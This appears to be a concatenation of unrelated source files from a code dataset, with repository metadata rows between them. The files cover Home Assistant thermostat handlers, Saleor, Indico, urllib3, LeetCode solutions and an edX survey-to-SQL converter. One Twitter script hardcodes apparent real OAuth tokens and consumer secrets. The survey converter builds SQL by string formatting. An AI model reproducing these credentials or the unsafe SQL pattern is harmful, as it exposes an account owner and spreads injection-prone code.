elif temp is not None:
temp = int(temp * ZCL_TEMP)
if self.hvac_mode == HVACMode.COOL:
success = await thrm.async_set_cooling_setpoint(
temp, self.preset_mode == PRESET_AWAY
)
elif self.hvac_mode == HVACMode.HEAT:
success = await thrm.async_set_heating_setpoint(
temp, self.preset_mode == PRESET_AWAY
)
else:
self.debug("Not setting temperature for '%s' mode", self.hvac_mode)
return
else:
self.debug("incorrect %s setting for '%s' mode", kwargs, self.hvac_mode)
return
if success:
self.async_write_ha_state()
async def async_preset_handler(self, preset: str, enable: bool = False) -> bool:
"""Set the preset mode via handler."""
handler = getattr(self, f"async_preset_handler_{preset}")
return await handler(enable)
@MULTI_MATCH(
cluster_handler_names={CLUSTER_HANDLER_THERMOSTAT, "sinope_manufacturer_specific"},
manufacturers="Sinope Technologies",
stop_on_match_group=CLUSTER_HANDLER_THERMOSTAT,
)
class SinopeTechnologiesThermostat(Thermostat):
"""Sinope Technologies Thermostat."""
manufacturer = 0x119C
update_time_interval = timedelta(minutes=randint(45, 75))
def __init__(self, unique_id, zha_device, cluster_handlers, **kwargs):
"""Initialize ZHA Thermostat instance."""
super().__init__(unique_id, zha_device, cluster_handlers, **kwargs)
self._presets = [PRESET_AWAY, PRESET_NONE]
self._supported_flags |= ClimateEntityFeature.PRESET_MODE
self._manufacturer_ch = self.cluster_handlers["sinope_manufacturer_specific"]
@property
def _rm_rs_action(self) -> HVACAction:
"""Return the current HVAC action based on running mode and running state."""
running_mode = self._thrm.running_mode
if running_mode == T.SystemMode.Heat:
return HVACAction.HEATING
if running_mode == T.SystemMode.Cool:
return HVACAction.COOLING
running_state = self._thrm.running_state
if running_state and running_state & (
T.RunningState.Fan_State_On
| T.RunningState.Fan_2nd_Stage_On
| T.RunningState.Fan_3rd_Stage_On
):
return HVACAction.FAN
if self.hvac_mode != HVACMode.OFF and running_mode == T.SystemMode.Off:
return HVACAction.IDLE
return HVACAction.OFF
@callback
def _async_update_time(self, timestamp=None) -> None:
"""Update thermostat's time display."""
secs_2k = (
dt_util.now().replace(tzinfo=None) - datetime(2000, 1, 1, 0, 0, 0, 0)
).total_seconds()
self.debug("Updating time: %s", secs_2k)
self._manufacturer_ch.cluster.create_catching_task(
self._manufacturer_ch.cluster.write_attributes(
{"secs_since_2k": secs_2k}, manufacturer=self.manufacturer
)
)
async def async_added_to_hass(self) -> None:
"""Run when about to be added to Hass."""
await super().async_added_to_hass()
self.async_on_remove(
async_track_time_interval(
self.hass, self._async_update_time, self.update_time_interval
)
)
self._async_update_time()
async def async_preset_handler_away(self, is_away: bool = False) -> bool:
"""Set occupancy."""
mfg_code = self._zha_device.manufacturer_code
res = await self._thrm.write_attributes(
{"set_occupancy": 0 if is_away else 1}, manufacturer=mfg_code
)
self.debug("set occupancy to %s. Status: %s", 0 if is_away else 1, res)
return res
@MULTI_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
aux_cluster_handlers=CLUSTER_HANDLER_FAN,
manufacturers={"Zen Within", "LUX"},
stop_on_match_group=CLUSTER_HANDLER_THERMOSTAT,
)
class ZenWithinThermostat(Thermostat):
"""Zen Within Thermostat implementation."""
@MULTI_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
aux_cluster_handlers=CLUSTER_HANDLER_FAN,
manufacturers="Centralite",
models={"3157100", "3157100-E"},
stop_on_match_group=CLUSTER_HANDLER_THERMOSTAT,
)
class CentralitePearl(ZenWithinThermostat):
"""Centralite Pearl Thermostat implementation."""
@STRICT_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
manufacturers={
"_TZE200_ckud7u2l",
"_TZE200_ywdxldoj",
"_TZE200_cwnjrr72",
"_TZE200_2atgpdho",
"_TZE200_pvvbommb",
"_TZE200_4eeyebrt",
"_TZE200_cpmgn2cf",
"_TZE200_9sfg7gm0",
"_TZE200_8whxpsiw",
"_TYST11_ckud7u2l",
"_TYST11_ywdxldoj",
"_TYST11_cwnjrr72",
"_TYST11_2atgpdho",
},
)
class MoesThermostat(Thermostat):
"""Moes Thermostat implementation."""
def __init__(self, unique_id, zha_device, cluster_handlers, **kwargs):
"""Initialize ZHA Thermostat instance."""
super().__init__(unique_id, zha_device, cluster_handlers, **kwargs)
self._presets = [
PRESET_NONE,
PRESET_AWAY,
PRESET_SCHEDULE,
PRESET_COMFORT,
PRESET_ECO,
PRESET_BOOST,
PRESET_COMPLEX,
]
self._supported_flags |= ClimateEntityFeature.PRESET_MODE
@property
def hvac_modes(self) -> list[HVACMode]:
"""Return only the heat mode, because the device can't be turned off."""
return [HVACMode.HEAT]
async def async_attribute_updated(self, record):
"""Handle attribute update from device."""
if record.attr_name == "operation_preset":
if record.value == 0:
self._preset = PRESET_AWAY
if record.value == 1:
self._preset = PRESET_SCHEDULE
if record.value == 2:
self._preset = PRESET_NONE
if record.value == 3:
self._preset = PRESET_COMFORT
if record.value == 4:
self._preset = PRESET_ECO
if record.value == 5:
self._preset = PRESET_BOOST
if record.value == 6:
self._preset = PRESET_COMPLEX
await super().async_attribute_updated(record)
async def async_preset_handler(self, preset: str, enable: bool = False) -> bool:
"""Set the preset mode."""
mfg_code = self._zha_device.manufacturer_code
if not enable:
return await self._thrm.write_attributes(
{"operation_preset": 2}, manufacturer=mfg_code
)
if preset == PRESET_AWAY:
return await self._thrm.write_attributes(
{"operation_preset": 0}, manufacturer=mfg_code
)
if preset == PRESET_SCHEDULE:
return await self._thrm.write_attributes(
{"operation_preset": 1}, manufacturer=mfg_code
)
if preset == PRESET_COMFORT:
return await self._thrm.write_attributes(
{"operation_preset": 3}, manufacturer=mfg_code
)
if preset == PRESET_ECO:
return await self._thrm.write_attributes(
{"operation_preset": 4}, manufacturer=mfg_code
)
if preset == PRESET_BOOST:
return await self._thrm.write_attributes(
{"operation_preset": 5}, manufacturer=mfg_code
)
if preset == PRESET_COMPLEX:
return await self._thrm.write_attributes(
{"operation_preset": 6}, manufacturer=mfg_code
)
return False
@STRICT_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
manufacturers={
"_TZE200_b6wax7g0",
},
)
class BecaThermostat(Thermostat):
"""Beca Thermostat implementation."""
def __init__(self, unique_id, zha_device, cluster_handlers, **kwargs):
"""Initialize ZHA Thermostat instance."""
super().__init__(unique_id, zha_device, cluster_handlers, **kwargs)
self._presets = [
PRESET_NONE,
PRESET_AWAY,
PRESET_SCHEDULE,
PRESET_ECO,
PRESET_BOOST,
PRESET_TEMP_MANUAL,
]
self._supported_flags |= ClimateEntityFeature.PRESET_MODE
@property
def hvac_modes(self) -> list[HVACMode]:
"""Return only the heat mode, because the device can't be turned off."""
return [HVACMode.HEAT]
async def async_attribute_updated(self, record):
"""Handle attribute update from device."""
if record.attr_name == "operation_preset":
if record.value == 0:
self._preset = PRESET_AWAY
if record.value == 1:
self._preset = PRESET_SCHEDULE
if record.value == 2:
self._preset = PRESET_NONE
if record.value == 4:
self._preset = PRESET_ECO
if record.value == 5:
self._preset = PRESET_BOOST
if record.value == 7:
self._preset = PRESET_TEMP_MANUAL
await super().async_attribute_updated(record)
async def async_preset_handler(self, preset: str, enable: bool = False) -> bool:
"""Set the preset mode."""
mfg_code = self._zha_device.manufacturer_code
if not enable:
return await self._thrm.write_attributes(
{"operation_preset": 2}, manufacturer=mfg_code
)
if preset == PRESET_AWAY:
return await self._thrm.write_attributes(
{"operation_preset": 0}, manufacturer=mfg_code
)
if preset == PRESET_SCHEDULE:
return await self._thrm.write_attributes(
{"operation_preset": 1}, manufacturer=mfg_code
)
if preset == PRESET_ECO:
return await self._thrm.write_attributes(
{"operation_preset": 4}, manufacturer=mfg_code
)
if preset == PRESET_BOOST:
return await self._thrm.write_attributes(
{"operation_preset": 5}, manufacturer=mfg_code
)
if preset == PRESET_TEMP_MANUAL:
return await self._thrm.write_attributes(
{"operation_preset": 7}, manufacturer=mfg_code
)
return False
@MULTI_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
manufacturers="Stelpro",
models={"SORB"},
stop_on_match_group=CLUSTER_HANDLER_THERMOSTAT,
)
class StelproFanHeater(Thermostat):
"""Stelpro Fan Heater implementation."""
@property
def hvac_modes(self) -> list[HVACMode]:
"""Return only the heat mode, because the device can't be turned off."""
return [HVACMode.HEAT]
@STRICT_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
manufacturers={
"_TZE200_7yoranx2",
"_TZE200_e9ba97vf", # TV01-ZG
"_TZE200_hue3yfsn", # TV02-ZG
"_TZE200_husqqvux", # TSL-TRV-TV01ZG
"_TZE200_kds0pmmv", # MOES TRV TV02
"_TZE200_kly8gjlz", # TV05-ZG
"_TZE200_lnbfnyxd",
"_TZE200_mudxchsu",
},
)
class ZONNSMARTThermostat(Thermostat):
"""ZONNSMART Thermostat implementation.
Notice that this device uses two holiday presets (2: HolidayMode,
3: HolidayModeTemp), but only one of them can be set.
"""
PRESET_HOLIDAY = "holiday"
PRESET_FROST = "frost protect"
def __init__(self, unique_id, zha_device, cluster_handlers, **kwargs):
"""Initialize ZHA Thermostat instance."""
super().__init__(unique_id, zha_device, cluster_handlers, **kwargs)
self._presets = [
PRESET_NONE,
self.PRESET_HOLIDAY,
PRESET_SCHEDULE,
self.PRESET_FROST,
]
self._supported_flags |= ClimateEntityFeature.PRESET_MODE
async def async_attribute_updated(self, record):
"""Handle attribute update from device."""
if record.attr_name == "operation_preset":
if record.value == 0:
self._preset = PRESET_SCHEDULE
if record.value == 1:
self._preset = PRESET_NONE
if record.value == 2:
self._preset = self.PRESET_HOLIDAY
if record.value == 3:
self._preset = self.PRESET_HOLIDAY
if record.value == 4:
self._preset = self.PRESET_FROST
await super().async_attribute_updated(record)
async def async_preset_handler(self, preset: str, enable: bool = False) -> bool:
"""Set the preset mode."""
mfg_code = self._zha_device.manufacturer_code
if not enable:
return await self._thrm.write_attributes(
{"operation_preset": 1}, manufacturer=mfg_code
)
if preset == PRESET_SCHEDULE:
return await self._thrm.write_attributes(
{"operation_preset": 0}, manufacturer=mfg_code
)
if preset == self.PRESET_HOLIDAY:
return await self._thrm.write_attributes(
{"operation_preset": 3}, manufacturer=mfg_code
)
if preset == self.PRESET_FROST:
return await self._thrm.write_attributes(
{"operation_preset": 4}, manufacturer=mfg_code
)
return False
| [
"[email protected]"
] | |
e191dcd55943188856e0aa6d20abcb3ae22cd4d2 | c5698844e4c5cd6428d25f5a97a2f4ad069df251 | /twitter/publicar desde python/read.py | a394d4c896e493b5d9f689dc1751a7b77d468356 | [] | no_license | jrartd/Python-tools | 1ade026dcc9b3987bb7a6af130403895a8456d3c | 361031a2d108e048d267bf386a8a703359a81321 | refs/heads/master | 2022-12-21T23:38:53.038535 | 2018-02-09T18:18:10 | 2018-02-09T18:18:10 | 114,409,529 | 0 | 1 | null | 2022-12-12T09:18:07 | 2017-12-15T20:41:15 | HTML | UTF-8 | Python | false | false | 458 | py | from twitter import *
access_token = "712533602102284288-QGxqYcFiQlGZGTaoNIgHgq2KZxqZeeH"
access_token_secret = "rlH5ItRHtlguzChQbIvLDo1yYCu47liEtq8fdVgeOZpb9"
consumer_key = "VWe4b0p7vRcVS06gbJyS83dIS"
consumer_secret = "PjkoSJ4YxPXo4V9Uk7bazq4y507e6zBr96q7u2OlJeP1aVZd7w"
texto_tweet = input("Ingrese el texto a twittear")
t = Twitter(auth=OAuth(access_token, access_token_secret, consumer_key, consumer_secret))
t.statuses.update(status= texto_tweet)
| [
"[email protected]"
] | |
a1590dd5a7d854d633c6cc4a59cd757b06b26e95 | 84c4474a88a59da1e72d86b33b5326003f578271 | /saleor/graphql/app/mutations/app_retry_install.py | 64faee9ee45caa39c2e77961854e66c1815f20c1 | [
"BSD-3-Clause"
] | permissive | vineetb/saleor | 052bd416d067699db774f06453d942cb36c5a4b7 | b0d5ec1a55f2ceeba6f62cf15f53faea0adf93f9 | refs/heads/main | 2023-07-20T02:01:28.338748 | 2023-07-17T06:05:36 | 2023-07-17T06:05:36 | 309,911,573 | 0 | 0 | NOASSERTION | 2020-11-04T06:32:55 | 2020-11-04T06:32:55 | null | UTF-8 | Python | false | false | 2,274 | py | import graphene
from django.core.exceptions import ValidationError
from ....app import models
from ....app.error_codes import AppErrorCode
from ....app.tasks import install_app_task
from ....core import JobStatus
from ....permission.enums import AppPermission
from ....webhook.event_types import WebhookEventAsyncType
from ...core import ResolveInfo
from ...core.mutations import ModelMutation
from ...core.types import AppError
from ...core.utils import WebhookEventInfo
from ..types import AppInstallation
class AppRetryInstall(ModelMutation):
class Arguments:
id = graphene.ID(description="ID of failed installation.", required=True)
activate_after_installation = graphene.Boolean(
default_value=True,
required=False,
description="Determine if app will be set active or not.",
)
class Meta:
description = "Retry failed installation of new app."
model = models.AppInstallation
object_type = AppInstallation
permissions = (AppPermission.MANAGE_APPS,)
error_type_class = AppError
error_type_field = "app_errors"
webhook_events_info = [
WebhookEventInfo(
type=WebhookEventAsyncType.APP_INSTALLED,
description="An app was installed.",
),
]
@classmethod
def save(cls, _info: ResolveInfo, instance, _cleaned_input, /):
instance.status = JobStatus.PENDING
instance.save()
@classmethod
def clean_instance(cls, _info: ResolveInfo, instance):
if instance.status != JobStatus.FAILED:
msg = "Cannot retry installation with different status than failed."
code = AppErrorCode.INVALID_STATUS.value
raise ValidationError({"id": ValidationError(msg, code=code)})
@classmethod
def perform_mutation(cls, _root, info: ResolveInfo, /, **data):
activate_after_installation = data.get("activate_after_installation")
app_installation = cls.get_instance(info, **data)
cls.clean_instance(info, app_installation)
cls.save(info, app_installation, None)
install_app_task.delay(app_installation.pk, activate_after_installation)
return cls.success_response(app_installation)
| [
"[email protected]"
] | |
0573b6563ad45c09808049f4fdd2f87ff082fce9 | ba157236151a65e3e1fde2db78b0c7db81b5d3f6 | /String/longest_group_positions.py | f01ef3284224992f2d915fed2ff79a7296bfda75 | [] | no_license | JaberKhanjk/LeetCode | 152488ccf385b449d2a97d20b33728483029f85b | 78368ea4c8dd8efc92e3db775b249a2f8758dd55 | refs/heads/master | 2023-02-08T20:03:34.704602 | 2020-12-26T06:24:33 | 2020-12-26T06:24:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | class Solution(object):
def largeGroupPositions(self, s):
ans = []
i = 0
for j in range(len(s)):
if j == len(s) - 1 or s[j] != s[j+1]:
if j-i+1 >= 3:
ans.append([i,j])
i = j+1
return ans
"""
:type s: str
:rtype: List[List[int]]
"""
| [
"[email protected]"
] | |
ed83b8b9465e7789fbdf5342d12e6863ef98a36d | ab79ca83f97aff1f5e00d46781e0355b8e26b4c7 | /LogTranslation/SurveyMode.py | 32758c98925e9a4ab2306d4f3422dfbebcbe5061 | [] | no_license | AngusGLChen/LearningTransfer | d966ece2b94b3287f7cf0468ae7afd9591c64d99 | 956c9a9e557deb959b26ae42fb46eba38fb417dd | refs/heads/master | 2021-01-19T06:42:47.967713 | 2016-06-20T19:18:09 | 2016-06-20T19:18:09 | 61,573,656 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 12,461 | py | '''
Created on Jul 27, 2015
@author: Angus
'''
import os,re
from sets import Set
def survey_mode(path):
files = os.listdir(path)
course_id = ""
id_map = {}
response_id_set = set()
# Output survey_description table
survey_description_path = os.path.dirname(os.path.dirname(os.path.dirname(path))) + "/Results/FP101x/" + "survey_description.sql"
if os.path.isfile(survey_description_path):
os.remove(survey_description_path)
survey_description_file = open(survey_description_path, 'wb')
survey_description_file.write("\r\n" + "USE FP101x;" + "\r\n")
survey_description_file.write("\r\n" + "DROP TABLE IF EXISTS survey_description; CREATE TABLE survey_description (question_id varchar(255) NOT NULL, course_id varchar(255), question_type varchar(255), description text, PRIMARY KEY (question_id), FOREIGN KEY (course_id) REFERENCES courses(course_id)) ENGINE=MyISAM;" + "\r\n")
# Output survey_response table
survey_response_path = os.path.dirname(os.path.dirname(os.path.dirname(path))) + "/Results/FP101x/" + "survey_response.sql"
if os.path.isfile(survey_response_path):
os.remove(survey_response_path)
survey_response_file = open(survey_response_path, 'wb')
survey_response_file.write("\r\n" + "USE FP101x;" + "\r\n")
survey_response_file.write("\r\n" + "DROP TABLE IF EXISTS survey_response; CREATE TABLE survey_response (response_id varchar(255) NOT NULL, course_user_id varchar(255), question_id varchar(255), answer text, PRIMARY KEY (response_id), FOREIGN KEY (course_user_id) REFERENCES global_user(course_user_id)) ENGINE=MyISAM;" + "\r\n")
# Processing course_structure data
for file in files:
if "course_structure" in file:
# To extract course_id
course_id_array = file.split("-")
course_id = course_id_array[0] + "/" + course_id_array[1] + "/" + course_id_array[2]
# Processing ID information
for file in files:
if "2014T3_FP101x" in file:
sub_path = path + file + "/"
sub_files = os.listdir(sub_path)
for sub_file in sub_files:
if "FP Course Data" in sub_file:
id_path = sub_path + sub_file + "/"
id_files = os.listdir(id_path)
for id_file in id_files:
if "-anon-ids" in id_file:
fp = open(id_path + id_file, "r")
fp.readline()
lines = fp.readlines()
for line in lines:
array = line.split(",")
global_id = array[0].replace("\"","")
anonymized_id = array[1].replace("\"","")
id_map[anonymized_id] = global_id
# Processing Pre-survey information
for file in files:
if "2014T3_FP101x" in file:
sub_path = path + file + "/"
sub_files = os.listdir(sub_path)
for sub_file in sub_files:
if "FP Pre Survey" in sub_file:
pre_path = sub_path + sub_file + "/"
pre_files = os.listdir(pre_path)
for pre_file in pre_files:
if "survey_updated" in pre_file:
fp = open(pre_path + pre_file, "r")
# To process question_id line
question_id_line = fp.readline()
question_id_array = question_id_line.split(",")
# To process question description line
question_line = fp.readline()
question_line = question_line.replace("\",NA,\"","\",\"NA\",\"")
question_array = question_line.split("\",\"")
for i in range(23,98):
question_id = course_id + "_pre_" + question_id_array[i].replace("\"","")
question_array[i] = question_array[i].replace("\'", "\\'")
write_string = "\r\n" + "insert into survey_description (question_id, course_id, question_type, description) values"
write_string += "('%s','%s','%s','%s');\r\n" % (question_id, course_id, "pre", question_array[i])
survey_description_file.write(write_string)
response_lines = fp.readlines()
num_multipleID = 0
for response_line in response_lines:
response_line = response_line.replace("\",NA,\"","\",\"NA\",\"")
subRegex = re.compile("\(([^\(\)]*)\)")
matches = subRegex.findall(response_line)
if not len(matches) == 0:
for match in matches:
response_line = response_line.replace(match, "")
response_array = response_line.split("\",\"")
# print response_array[103]
if response_array[103] in id_map.keys():
course_user_id = course_id + "_" + id_map[response_array[103]]
for i in range(23,98):
question_id = course_id + "_" + "pre" + "_" + question_id_array[i].replace("\"","")
response_id = course_user_id + "_" + "pre" + "_" + question_id_array[i].replace("\"","")
if response_id not in response_id_set:
response_array[i] = response_array[i].replace("\'", "\\'")
write_string = "\r\n" + "insert into survey_response (response_id, course_user_id, question_id, answer) values"
write_string += "('%s','%s','%s','%s');\r\n" % (response_id, course_user_id, question_id, response_array[i])
survey_response_file.write(write_string)
response_id_set.add(response_id)
# else:
# print response_id + "\t" + response_array[103] + "\t" + question_array[i]
else:
num_multipleID += 1
# print response_line
print "Pre - The number of response is: " + str(len(response_lines))
print "Pre - The number of response with multiple/empty IDs is: " + str(num_multipleID)
print ""
# Processing Post-survey information
for file in files:
if "2014T3_FP101x" in file:
sub_path = path + file + "/"
sub_files = os.listdir(sub_path)
for sub_file in sub_files:
if "FP Post Survey" in sub_file:
post_path = sub_path + sub_file + "/"
post_files = os.listdir(post_path)
for post_file in post_files:
if "survey_updated" in post_file:
fp = open(post_path + post_file, "r")
# To process question_id line
question_id_line = fp.readline()
question_id_array = question_id_line.split(",")
# To process question description line
question_line = fp.readline()
question_line = question_line.replace("\",NA,\"","\",\"NA\",\"")
question_array = question_line.split("\",\"")
for i in range(15,113):
question_id = course_id + "_post_" + question_id_array[i].replace("\"","")
# print question_id
question_array[i] = question_array[i].replace("\'", "\\'")
write_string = "\r\n" + "insert into survey_description (question_id, course_id, question_type, description) values"
write_string += "('%s','%s','%s','%s');\r\n" % (question_id, course_id, "post", question_array[i])
survey_description_file.write(write_string)
response_lines = fp.readlines()
num_multipleID = 0
for response_line in response_lines:
response_line = response_line.replace("\",NA,\"","\",\"NA\",\"")
subRegex = re.compile("\(([^\(\)]*)\)")
matches = subRegex.findall(response_line)
if not len(matches) == 0:
for match in matches:
response_line = response_line.replace(match, "")
response_array = response_line.split("\",\"")
if response_array[118] in id_map.keys():
course_user_id = course_id + "_" + id_map[response_array[118]]
for i in range(15,113):
question_id = course_id + "_post_" + question_id_array[i].replace("\"","")
response_id = course_user_id + "_post_" + question_id_array[i].replace("\"","")
if response_id not in response_id_set:
response_array[i] = response_array[i].replace("\'", "\\'")
write_string = "\r\n" + "insert into survey_response (response_id, course_user_id, question_id, answer) values"
write_string += "('%s','%s','%s','%s');\r\n" % (response_id, course_user_id, question_id, response_array[i])
survey_response_file.write(write_string)
response_id_set.add(response_id)
# else:
# print response_id + "\t" + response_array[118] + "\t" + question_array[i]
else:
num_multipleID += 1
print "Post - The number of response is: " + str(len(response_lines))
print "Post - The number of response with multiple/empty IDs is: " + str(num_multipleID)
survey_description_file.close()
survey_response_file.close()
| [
"[email protected]"
] | |
2a947f6dde626fc5c7a608db41b0b51fbd6eafdb | 8d5ba6747531cbd43d63d32265fd608f9081c3b7 | /.venv/lib/python2.7/site-packages/indico/core/db/sqlalchemy/custom/unaccent.py | b4838177828f13481121fa0984a94d46e9307b19 | [] | no_license | Collinsnyamao/indico | 0e433b78803afae5b1ac90483db1f3d90ce2fddb | 32adf8123e266eb81439b654abc993b98e0cd7f2 | refs/heads/master | 2020-03-18T04:55:40.386595 | 2018-06-02T13:45:47 | 2018-06-02T13:45:47 | 134,314,163 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,436 | py | # This file is part of Indico.
# Copyright (C) 2002 - 2018 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from sqlalchemy import DDL, Index, text
from sqlalchemy.event import listens_for
from sqlalchemy.sql import func
from sqlalchemy.sql.elements import conv
from indico.util.string import to_unicode
# if you wonder why search_path is set and the two-argument `unaccent` function is used,
# see this post on stackoverflow: http://stackoverflow.com/a/11007216/298479
SQL_FUNCTION_UNACCENT = '''
CREATE FUNCTION indico.indico_unaccent(value TEXT)
RETURNS TEXT
AS $$
BEGIN
RETURN unaccent('unaccent', value);
END;
$$
LANGUAGE plpgsql IMMUTABLE SET search_path = public, pg_temp;
'''
def _should_create_function(ddl, target, connection, **kw):
sql = "SELECT COUNT(*) FROM information_schema.routines WHERE routine_name = 'indico_unaccent'"
count = connection.execute(text(sql)).scalar()
return not count
def create_unaccent_function(conn):
"""Creates the unaccent function if it doesn't exist yet.
In TESTING mode it always uses the no-op version to have a
consistent database setup.
"""
DDL(SQL_FUNCTION_UNACCENT).execute_if(callable_=_should_create_function).execute(conn)
def define_unaccented_lowercase_index(column):
"""Defines an index that uses the indico_unaccent function.
Since this is usually used for searching, the column's value is
also converted to lowercase before being unaccented. To make proper
use of this index, use this criterion when querying the table::
db.func.indico.indico_unaccent(db.func.lower(column)).ilike(...)
The index will use the trgm operators which allow very efficient LIKE
even when searching e.g. ``LIKE '%something%'``.
:param column: The column the index should be created on, e.g.
``User.first_name``
"""
@listens_for(column.table, 'after_create')
def _after_create(target, conn, **kw):
assert target is column.table
col_func = func.indico.indico_unaccent(func.lower(column))
index_kwargs = {'postgresql_using': 'gin',
'postgresql_ops': {col_func.key: 'gin_trgm_ops'}}
Index(conv('ix_{}_{}_unaccent'.format(column.table.name, column.name)), col_func, **index_kwargs).create(conn)
def unaccent_match(column, value, exact):
from indico.core.db import db
value = to_unicode(value).replace('%', r'\%').replace('_', r'\_').lower()
if not exact:
value = '%{}%'.format(value)
# we always use LIKE, even for an exact match. when using the pg_trgm indexes this is
# actually faster than `=`
return db.func.indico.indico_unaccent(db.func.lower(column)).ilike(db.func.indico.indico_unaccent(value))
| [
"[email protected]"
] | |
6371e03f7e86aed6d39e751ba81d7471c80155ef | 7d2f933ed3c54e128ecaec3a771817c4260a8458 | /venv/Lib/site-packages/requests/packages/urllib3/__init__.py | f669e1f517d93579a48a00c7ca81b40ac6d206c5 | [] | no_license | danielmoreira12/BAProject | c61dfb1d0521eb5a28eef9531a00e744bfb0e26a | 859f588305d826a35cc8f7d64c432f54a0a2e031 | refs/heads/master | 2021-01-02T07:17:39.267278 | 2020-02-25T22:27:43 | 2020-02-25T22:27:43 | 239,541,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,700 | py | # urllib3/__init__.py
# Copyright 2008-2013 Andrey Petrov and contributors (see CONTRIBUTORS.txt)
#
# This module is part of urllib3 and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
urllib3 - Thread-safe connection pooling and re-using.
"""
__author__ = 'Andrey Petrov ([email protected])'
__license__ = 'MIT'
__version__ = 'dev'
# Set default logging handler to avoid "No handler found" warnings.
import logging
from . import exceptions
from .connectionpool import (
HTTPConnectionPool,
HTTPSConnectionPool,
connection_from_url
)
from .filepost import encode_multipart_formdata
from .poolmanager import PoolManager, ProxyManager, proxy_from_url
from .response import HTTPResponse
from .util import make_headers, get_host, Timeout
try: # Python 2.7+
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
def add_stderr_logger(level=logging.DEBUG):
"""
Helper for quickly adding a StreamHandler to the logger. Useful for
debugging.
Returns the handler after adding it.
"""
# This method needs to be in this __init__.py to get the __name__ correct
# even if urllib3 is vendored within another package.
logger = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
logger.addHandler(handler)
logger.setLevel(level)
logger.debug('Added an stderr logging handler to logger: %s' % __name__)
return handler
# ... Clean up.
del NullHandler
| [
"[email protected]"
] | |
f48b6acd7862cead47ba1fafc6a3ebd6557b73be | 303bac96502e5b1666c05afd6c2e85cf33f19d8c | /solutions/python3/993.py | d918d769447829914b6898f916ac2d314071b6a7 | [
"MIT"
] | permissive | jxhangithub/leetcode | 5e82f4aeee1bf201e93e889e5c4ded2fcda90437 | 0de1af607557d95856f0e4c2a12a56c8c57d731d | refs/heads/master | 2022-05-22T12:57:54.251281 | 2022-03-09T22:36:20 | 2022-03-09T22:36:20 | 370,508,127 | 1 | 0 | MIT | 2022-03-09T22:36:20 | 2021-05-24T23:16:10 | null | UTF-8 | Python | false | false | 430 | py | class Solution:
def isCousins(self, root: TreeNode, x: int, y: int) -> bool:
def dfs(node, parent, depth, mod):
if node:
if node.val == mod:
return depth, parent
return dfs(node.left, node, depth + 1, mod) or dfs(node.right, node, depth + 1, mod)
dx, px, dy, py = dfs(root, None, 0, x) + dfs(root, None, 0, y)
return dx == dy and px != py | [
"[email protected]"
] | |
869d4de40b4774adacf3db6705df1c3d7a5ab419 | cb2411c5e770bcdd07b170c2bc07f5e0cc72fc86 | /Greedy/55. Jump Game.py | 6ad22c17c7c535c3c1f269e0caf4426d60a13b2f | [] | no_license | roy355068/Algo | f79cf51662832e33664fc1d2479f79405d586e2e | 14febbb5d8504438ef143678dedc89d4b61b07c9 | refs/heads/master | 2021-05-11T04:32:11.434762 | 2018-01-30T00:01:26 | 2018-01-30T00:01:26 | 117,941,600 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,905 | py | # Given an array of non-negative integers, you are initially positioned at the first index of the array.
# Each element in the array represents your maximum jump length at that position.
# Determine if you are able to reach the last index.
# For example:
# A = [2,3,1,1,4], return true.
# A = [3,2,1,0,4], return false.
# Idea is that use a maximumReach variable to track the max range of the array can reach
# if i > m, indicated that i is not reachable by previous element and jumping
# so end the program earlier and return False, else if maximumReach >= the index of
# last element, meaning that the last element is reachable, return True
class Solution(object):
def canJump(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
# O(N ^ 2) time, O(N) space complexity
if not nums or len(nums) == 1:
return True
# jump array is a dp array that used to check if the index is reachable
jump = [False for _ in xrange(len(nums))]
jump[0] = True
for i in xrange(len(nums)):
step = nums[i]
j = i + 1
# jump[i] == True means that this index is reachable based
# on the jump steps before it
if jump[i] == True:
# update all indices that is reachable from current stand point
while j <= len(nums) - 1 and j < i + step + 1:
jump[j] = True
j += 1
return jump[-1]
# Optimized, O(N) time, O(1) space complexity
i, reachable = 0, 0
# if i exceeds reachable, meaning that current index is never going
# to be reachable by jumping from previous indices
# hence stop the loop earlier
while i < len(nums) and i <= reachable:
reachable = max(reachable, i + nums[i])
i += 1
return i == len(nums)
| [
"[email protected]"
] | |
add36c49f08156fa9f65d5e079441f0e3c7f56f7 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03168/s086851558.py | 7143c7be26364089fb75fade50516b0a34c2696e | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | import sys
def input(): return sys.stdin.readline().rstrip()
def main():
n=int(input())
P=list(map(float,input().split()))
dp=[[0]*(n+1) for _ in range(n)]#コインi(0-)までで,j枚が表
dp[0][0]=1-P[0]
dp[0][1]=P[0]
for i in range(1,n):
for j in range(i+2):
